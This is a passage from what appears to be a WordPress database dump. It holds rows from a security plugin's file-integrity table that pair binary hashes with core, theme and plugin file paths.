�6�~�','wp-content/plugins/akismet/_inc/img/logo-full-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^K��-^��>A�s{�','�%>��:1��W��R����ͩ��Q�i��~�^G','',0,'?'),('�G�|$p֠+(�','wp-admin/js/tags-box.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9W�`��(P�E쐷','�������}�;R)_�J7���*��?���[','',0,'?'),('�H��ɪ\Z퟽4��ͻ','wp-content/plugins/wp-cerber/assets/flags/cl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�Q�a�A�ߜ����',' I���ײ|01aK�ը�r%բ�(ظlR�','',0,'?'),('�Q����ԁ�2�7u�L','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���3y����1��','	}��N�	<�v���B�S%�s\\���S�','',0,'?'),('�R��B�p��m�Z�;','wp-includes/css/dist/block-editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','݁mz���O���ya*p','��&aX�\n��q�E�D������$3Gt���','',0,'?'),('�y�Hz��\"�\\����','wp-content/plugins/wp-cerber/assets/flags/tl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�/`�3˸:��Ldlj','q\0HP��+���m �l�K��(��H�','',0,'?'),('�o�j����y��V','wp-content/plugins/wordfence/lib/menu_tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gԌ�p�P�Ig[=��','�V���!�ޟ��ƚ_z�=�|�yaX�ȏ�','',0,'?'),('��Ca�s�]��n�/��','wp-includes/css/dist/block-library/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�,U���ʑ�','��܉�)�\0I]�7h�S��l�(�B\n}kw�a','',0,'?'),('��Ѻ�\"�P5��^U�\Zi','wp-admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�	Ki\Zb+GZ��B','\r9�cgfĊ�T�v��S(�9IE�$�pH��','',0,'?'),('��m���z4�L��K','wp-admin/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('����A�G,��<���','wp-includes/js/jquery/ui/effect-fade.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*Bz��L��','�j�fD�G��=c�Fs㏽���~�쉹X','',0,'?'),('����n\0D,����;R','wp-content/plugins/wordfence/js/jquery.dataTables.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\\�� �͕�h�','v�Ao;�uD�3$�WB95�_\"��� �','',0,'?'),('���o?&��\n�e[���','wp-content/themes/magazine-hoot/include/admin/images/qstart-staticpage.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.N��6W��(�EEˎ','�s� C�~\n�#�m߬{FJ����[���\r|','',0,'?'),('�����հ	̋�Ȳ�S','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�Ƚ� ����\\E','��\\�	����O��JpF�>Q�� �?��lgi���.','',0,'?'),('� �n�$��q��^qf��','wp-includes/images/smilies/icon_lol.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����:ѷ&����(�','�l�1�Hq�.�2�x��󢾉$�Y�\Z8�','',0,'?'),('�\'^�D��IG�1��!','wp-includes/ms-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ظ;�#�t��r�/+0','J�c�CBE�䱢?$Gq�u,7��ޚ�A�','',0,'?'),('�*T�u\r�����~�m','wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v0O��,�ᤴX�׺�','찐p\\B�lI����`�{i�~����&QO','',0,'?'),('�1l<� t~L�Uw�','wp-includes/class-wp-locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�P�<�#��\0�\':','�D��n]����AW�EH�O�H�@�hAD}','',0,'?'),('�E-j��1j��\r�E�','wp-includes/registration-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q<۾\Z7�M�v��','Kd���_�MF� X��X�.,\'T\\��6���6','',0,'?'),('�E���\00�?oW��8kl','wp-content/themes/magazine-hoot/include/admin/images/2-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�\n�]�7�d�D7','q	��i:˾O<��iVb�pV~;���#�)l','',0,'?'),('�]oM�se��J4�','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o���h5��\rxܖN','6y\Zu�υ;�	�0�~�rs1J�9��X���J���','',0,'?'),('�f ��r�p�(��p�$�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('�g�K�;�qF�VI}�Q�','wp-includes/Requests/Exception/HTTP/416.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�N9�ɪ�a�Dx�','�(��mybV�aI�jWp���(!A����<(�X','',0,'?'),('�ir�u�5������','wp-content/themes/twentytwenty/assets/js/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,`��Ќe�dÉd','���*o��z@\n��g�cR��9%�GY�`(J0','',0,'?'),('�������<�x�B�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���xqE̜$�b0^�s','T\0>�t�d��ը&\Z4qɢ���A :�C�C��Q','',0,'?'),('��Ǟɇ�A��w�0^','wp-content/themes/magazine-hoot/hybrid/inc/class-template-hierarchy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>u t1� ��\\�9C��`','6��5c�6���Ŋ�L�%�a�㑬u)F�Q�','',0,'?'),('��e�-��Rȉ���L:�','wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�Z��O�;�m�#�','�v�̀��O��=��n��u�#�}��զ`�4�W�','',0,'?'),('���8���ՠ�)j,z','wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HB-���L\'�g�Aq','vɘ(�f]A��?p�AR\Za��Ɓ& A9\r[��2','',0,'?'),('��(M��0|�p�M=','wp-content/themes/magazine-hoot/hybrid/inc/functions-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���.\0��m���r�%','�7�!@=Α����*aLP�%SpQh�φ�','',0,'?'),('��p?E^�@�\'��PE�','wp-admin/edit-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��L�(�`��#��','W~T+��$��zgbl�ء\'���p3��m�1','',0,'?'),('��>i�>C�.�|#�q','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4�k�q¸�f&','<S�H>�x�Ɂ����9�|f2�Qν���mF','',0,'?'),('������U�\\��a�E','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��ͱ��r0��؅=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),('���i��֯1�o�R!','wp-content/plugins/wp-cerber/assets/flags/fm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=KbF�!X�ټh[�(@','/������ˆ�_S��L��`ZI�I(1���','',0,'?'),('�B����!��vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zz�#uv��\0���','��}���|IR€�v�J�%-�/\n�V���','',0,'?'),('�+�i�p�ZӶtB','wp-content/themes/twentytwentyone/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��rA�_�ù�_9','�ޔ�<N�6����o8���\r�����$i','',0,'?'),('�<��(��*A]�O�','wp-admin/css/colors/ocean/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','35\"�e4��9��,<?','n)(�Q�hA`�[��汶<�J��t({��dـ','',0,'?'),('�D��d.P˴{-yo�g','wp-content/plugins/wordfence/views/common/status-warning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�f�uֺg-g\0C�=v','�N<\r�;��d�*��8+)�\ZbO?�0��E���','',0,'?'),('�I|�K9�(�{s�X','wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}����\0���\Z�̿�','|�?b~����ڬ��(�ʹ׺;l�G9��','',0,'?'),('�N\"�,�_�	3���B�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-misc-options-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�B���4�H׫','i�썚<X�\'hw�4E�u�*\\���xQ��7�','',0,'?'),('�a�ͮ�(�o��:`','wp-content/plugins/wp-cerber/assets/flags/dm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�<�-�.��w','��h*W̕|l�0jhWp:���z��[V,','',0,'?'),('�bv��E��H���΄','wp-includes/js/wp-lists.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M4���KYs:��ȫ�','󩶓����Z-3w�Eї\rqK]��3�]��.X','',0,'?'),('�hS����:���`','wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�+C#+|�fZ���]�','kn\Zy�&��_��[��Igl�(�g\'�^�G','',0,'?'),('���&��N�,���6P','wp-admin/images/icons32-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*04�G4F�	&Z�i}\"','�.a�}��hw�6�WEʭ�(3�Jӭ�9�E�','',0,'?'),('�д��\0N莦v�\n=t','wp-content/plugins/wp-cerber/assets/flags/cz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cR��}S������J�','�m*1\"�vl�ř:\\��f����?.�؟i��\0�','',0,'?'),('��v��#q���ȃ�','wp-includes/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EOxٕX�2떭؃','x��aJN�!e���\"\"Nq�}�AMC�1)��{�j','',0,'?'),('��W31��N���gפ��','wp-includes/js/dist/vendor/react.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jB���e�}����\"\Z','�g��+_u<!�\'��[��N�b�r��c�>;','',0,'?'),('��x[�e��>M�','wp-admin/includes/edit-tag-messages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m-I�f3�f\\Z��','u�-h�yjL��!z�V���-1�nyFY�Ý�&�','',0,'?'),('�������1�!��N','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��;�NL���Hw�p','wp-content/themes/magazine-hoot/template-parts/comment-ping.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̲��#�\\��?�q%�','z��S��os|��N`�\'�������.���t','',0,'?'),('�q�h���Bc�92��','wp-admin/network/site-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bh@�Uj՟���G��\'{','9;#���l+��9���\"��p�LŢ�ۈ�|','',0,'?'),('���\\F�Z�7i�','wp-content/themes/twentynineteen/sass/site/primary/_comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�\0\0�P�qSqUь�','�n�BEqO�Ȉ����}]��� ��ULryi��','',0,'?'),('���I:�.�X�<��!�','wp-content/themes/twentytwenty/assets/images/2020-square-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��4(��|���&�','�`�z�z�Y`]���3��)�]:a>�?oez��','',0,'?'),('��n1.Óu�t���lX','wp-admin/css/colors/modern/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+@}�����nf\Z��E','Xi� t���j<u&����%C�\rA��\0�6!�','',0,'?'),('����`%��{��+��','wp-content/plugins/wordfence/images/icons/error128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�%7�!��.�','{h\0,�]�z�k�V�{җ�6nG\n�x��s9�','',0,'?'),('���v��\\Q���-��','wp-includes/js/tinymce/plugins/hr/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	%>�)���•;��','؃F��S�[k���&�f� 6+�b�>��','',0,'?'),('��t��h�	,Gx�\"M','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��R�N\Zb8M�g�|','{�����R�tH}��ܧYQ��{�F\Z�H�','',0,'?'),('��ū��[�\" ���E,','wp-content/themes/magazine-hoot/include/admin/widget-cta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�|h�u����P��:','�%2{:;�F&T91/�xA �ڐCۀ���','',0,'?'),('�ƚ�ŏH�Wn�\'i�','wp-content/plugins/wp-cerber/assets/goo-translate.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�c�\"C�!㋫x�o','�>��Cv^��/�V����r��cCƨK(��P��','',0,'?'),('���9�X����U�7�z','wp-content/plugins/wordfence/models/page/wfPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�bo i�%H��Xw�Xv','ƅ1h�/jw�<U���\\�k�q%s|W�6��','',0,'?'),('��і�q��SGKy(�','wp-includes/kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>F�ނS\0wt�R��','J�Mv��CkcC^f�`ƨ� S�@`�Uny�+��','',0,'?'),('��c�cXRd���','wp-content/themes/twentytwentyone/.stylelintrc-css.json',0,'���%fX٨�=TQ!','���%fX٨�=TQ!','rb�P�Z���#�Ue�xBS�6F셥Կ\\?�','',0,'?'),('�9��l�ן? r��q�','wp-includes/class-wp-user-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�Iyʰ�BzR��>�O','�gu,�$�bh�/7��C�<�l=��0x�3�x','',0,'?'),('�%��?���)�','wp-content/plugins/wordfence/views/common/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w]�Q�V�մi�','��q���r*���-T���N5�\r��Oc;m�a�','',0,'?'),('�DS���3.įy}�;','wp-admin/images/browser-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\"��ӠA�\Z����%̝','+啧���0��p�Ɯ��JMk �q�w�Xب�','',0,'?'),('�[�Hn[P�.~���FU|','wp-includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(������%��ӯq','?^��в�W�}T{5�3�m�T�:�锟��G','',0,'?'),('�j��\\��Ħ<y�p�','wp-includes/widgets/class-wp-widget-custom-html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���dz\'E�n�N��','��l.��M|yc�)�Vr�]�Ak�:Ʃ\"�A','',0,'?'),('����Z�\Zxcy�d��\'','wp-admin/js/language-chooser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U>�p4J�l��5�=','9���\rX�L�dC5@U���K&>̓l��#�','',0,'?'),('���-�4u��\Zo�','wp-content/plugins/wp-cerber/assets/flags/ye.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t?H&��@\r\r�J�','�~��p��\"&qƝq�*��۔�QV��Y�\\F','',0,'?'),('��[�s::��q��+�','wp-content/themes/twentytwentyone/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q���M\"�BC�	�','���~Բ��+@�w�GՑ.4C�O��iC���','',0,'?'),('���%�I3-�7�','wp-content/themes/twentynineteen/style-editor-customizer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	9�䩠�\"�\0m���','�/} ���	��ԾA9{�!���w���a��.','',0,'?'),('���%���\\(w����&','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I\0��$K��  �	','V�p\Z�1͌э�\'=~�ٲ�F_u\\��P�','',0,'?'),('��G^�2G��%�k���','wp-content/plugins/wp-cerber/assets/flags/fr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('��Gfir\0�)�|��S','wp-content/plugins/wordfence/css/phpinfo.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��Q���!�0w/�蓴','���a�@|��I\r=\Z^ε�d)�[�����W��','',0,'?'),('�����:x�=�}�','wp-includes/js/jquery/ui/mouse.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�;��ty����','�G������[&�~ͤ�E3�	�z͟��ӱ�','',0,'?'),('��C)�VxzϞ�ΩtP','wp-content/plugins/wp-cerber/assets/flags/um.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�xQos:h�\0A�qY','�?85�ϝ��r�o�e��[UԦM��\\','',0,'?'),('��H�a�+����̰I�','wp-content/plugins/wordfence/waf/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�%�S�\\!+���d�~','���8���|~�‘1뢇�:�HB�g撚r','',0,'?'),('��;�;/J�KmR��0�','wp-content/plugins/akismet/views/start.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�z�\"\'�\0�\0Y7^kTj','�=P���=�y�p��y�P���*u]����*','',0,'?'),('��O�I��Y�\\�{=�H','wp-includes/robots-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\��líܓM��','^�h��R߻u�ɆCZ11��S���&̊p0','',0,'?'),('��y�&a�A�7�]Dm','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%���B\ng�2��;','D,�A�J���lOS�p�e؇�&���','',0,'?'),('�ƞׅ\ZX�X]�Y�F','wp-includes/js/codemirror/htmlhint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�|џ�G�MtP5��','\0U[\0�M\'mCռ5��5k`����5�ё','',0,'?'),('�PB�\n��Z�Y �P�','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�21����b���m� ','H���>���@+��q�j(~�]�v`�즃�\'','',0,'?'),('� a\"KwT�bc1S','wp-admin/css/revisions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǰW��{�jڛ/$��','��j	ELCo�!;u��:�蛜|�|/���3eom','',0,'?'),('�-�[ip��\\^���]','wp-includes/widgets/class-wp-widget-tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x̭&�b�+|eS�݂','�,��ɼ?��?�	p�f\0qO��_���&N9','',0,'?'),('�0�&�Y�������','wp-content/plugins/wordfence/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('�2l�Ƴ;���-6�','wp-content/plugins/wp-cerber/modules/aaa-wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3W�T��\r�ط�18��','<�[�7�LĆ9�>gQ�:�56��bW�7��','',0,'?'),('�4g��e���>���ߝ','wp-admin/images/list-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hջIS�2��i�g�','��J�p�S_��X��#���UB�-z���,�','',0,'?'),('�;�f�J1��˘��+C','wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�<���^��=�f','s]ѽj$��	��↜������Sk��ik�','',0,'?'),('�OOwT�M\r��Y�!d','wp-includes/js/mediaelement/mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-6�������m����','���%�]�cط�Z���7�\n�ԋ���2���','',0,'?'),('�]ǿ|������IC�','wp-includes/js/dist/keycodes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!a����	��5/ �','8*�Zu%V��,�3Yb���k־�&) ���E','',0,'?'),('�fkj��N�Uei4=%�','wp-admin/js/tags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�,�yS�h�K=�c','9|Wü��yt�ϝ���]P,is�Ǯ���S7F���','',0,'?'),('�y%���Ǻ~�ne\"V','wp-admin/css/list-tables-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Rb��q\"�]�+\\','��m>� ��ӵ㿞í��\ZC��(8��(','',0,'?'),('��\Zv\0��̀Fn8���','wp-content/plugins/wp-cerber/assets/flags/tm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�d&���&����/��','�p�DƱq��ߙcc����D�J�cT5@�U�v\n','',0,'?'),('���/�-�Tǻ�T<�S','wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�L��$�~ZvV��','�\"��꯹�bG�����|���E���L�ٟ,','',0,'?'),('�ŕ��B^u?���3','wp-admin/images/about-color-palette.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B���i�h\n�[v���','\Z�AS��[�[��kn/�:�%��>\Z\'��_','',0,'?'),('�1�o%��q�A��','wp-admin/js/inline-edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�~<B^��k���','v-��a�F\\C�0��7C�����=VlԺ�','',0,'?'),('�TL �߈,]��զ�m�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�	�����:{��W��e','6{w���^Gk�Ϋ�25�b��\r��񓫄�','',0,'?'),('�m�H�:�M���*��^','wp-includes/css/dist/editor/editor-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iۘ\"���뱠��','���by:��8�3��o�\Z������\"ڹ�','',0,'?'),('�z�h9��ꈦ��Xp�+','wp-content/plugins/wordfence/views/scanner/no-issues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xt-|�F������e�','��_?7���c���:_��@���E�J��s��[','',0,'?'),('��9�n����P,��A��','wp-content/plugins/wp-cerber/assets/flags/pm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��\'�)v\rC��','`&�k$\nuxd�sh��RZ�\r��� (�Qf�','',0,'?'),('����v���V5ǃ�D�u','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ�\n�1�h;!�','�Mϡ�	����p�k��)����!\r��','',0,'?'),('����|���xY�iF','wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ߔ>�j7\'\r\0��','���K\ns�DШ�D}�\0b�x:�XJ�HlN~��k','',0,'?'),('��E�S�c+��#�)','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�Nm�S���C��{�','���P~�{p��}x{�8�2�hX�x���','',0,'?'),('��F�����{��A','wp-content/plugins/wordfence/lib/sysinfo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{X�6��92����','G,��=����C\Z3���~f�(8��Ψ��@�,ї','',0,'?'),('��;x��a�#��x�','wp-content/themes/magazine-hoot/hybrid/css/gallery.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h��t&f>S�e�c��','�5X��g�}�\r����(�$�|��W��l��','',0,'?'),('��E���Q?��	(�','wp-includes/class-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j,;�\Z3�x���','��0�v�!�vv7�H�lV�d���i\'K�����','',0,'?'),('�.݁B��xK�Y�','wp-includes/ms-default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�����n����','W�a�h\n�\0�8u�v���yv,N�����!�wh','',0,'?'),('���|��+|)7|��','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/4a.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$]���찉O�O&���','5�yIx4k5_����*W�i�-\n�C���|�\"B�','',0,'?'),('��6����~e�{�\".w','wp-includes/widgets/class-wp-widget-recent-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���f%�(��xfn3','��0ſ���Y�~�YǦ�����m','',0,'?'),('�*O-�Lτ���\r[�u','wp-admin/css/about-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��^Z\"^�v�\r','�\r�w�^���攗\n-�_l��<��\"���4W�X','',0,'?'),('�??n�����_2g��j','wp-includes/js/wp-util.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�J���2$J��+���','�u������g⽶����`߆�]�SR,�а�','',0,'?'),('�Yg�$z�H�.Y��','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gj��z7=���','����g��%��R�C�R}<�0�]�uɬK','',0,'?'),('��`$Ϯ���O�\0i','wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�В��o�a�\"��','l	@>	�8[w�t����?X扊�>��V}�€','',0,'?'),('��\n��R�b��x���g','wp-includes/css/dist/block-library/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;.�K� Ld�-�','�-��]y|��\"c�n��$�q�0LL��c�@','',0,'?'),('���K���\'�\Zxrx��','wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�	���,�W��\Z�^','Zv�MYWH��k��I=��\Z�Qj�E�ǟ�','',0,'?'),('��Y�\0)\r/j�)�Ar','wp-includes/customize/class-wp-customize-filter-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��`f��\0�iu�','�\0<\n�j:��Y�F���d�w��	���','',0,'?'),('�P�h`|/���:W�\0','wp-includes/blocks/columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q����-ڠ�t�56�',',C=ē0ȸ�a&�\"WӸ��Ă��0\n�(�73x','',0,'?'),('��DT\'{�_̤ؤP7','wp-content/plugins/wp-cerber/assets/flags/gf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('�$n1��U\\�x(�','wp-includes/blocks/missing/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�YԺ\"9N�Rt�f','k�E�E��+�hR�aw����߸��0{`����','',0,'?'),('�$_���X��la�','wp-includes/js/jquery/ui/sortable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kX���E�EL�&�','F\0|\'��Lk8qp� �(����� v�}/5N![','',0,'?'),('�R;lzO�8m<3�Nie','wp-admin/user/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`���U�� }��\n�','�οzB�+q���5Vl�K�l��k���Z/��|','',0,'?'),('�afh=F���T�:��6�','wp-admin/includes/class-ftp-sockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\"P����e<��3i','.\Z�D��-����ày!�����̕l��','',0,'?'),('�����;~ӷR�>��','wp-includes/class.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�zrU[\nK��z��','s�d����� 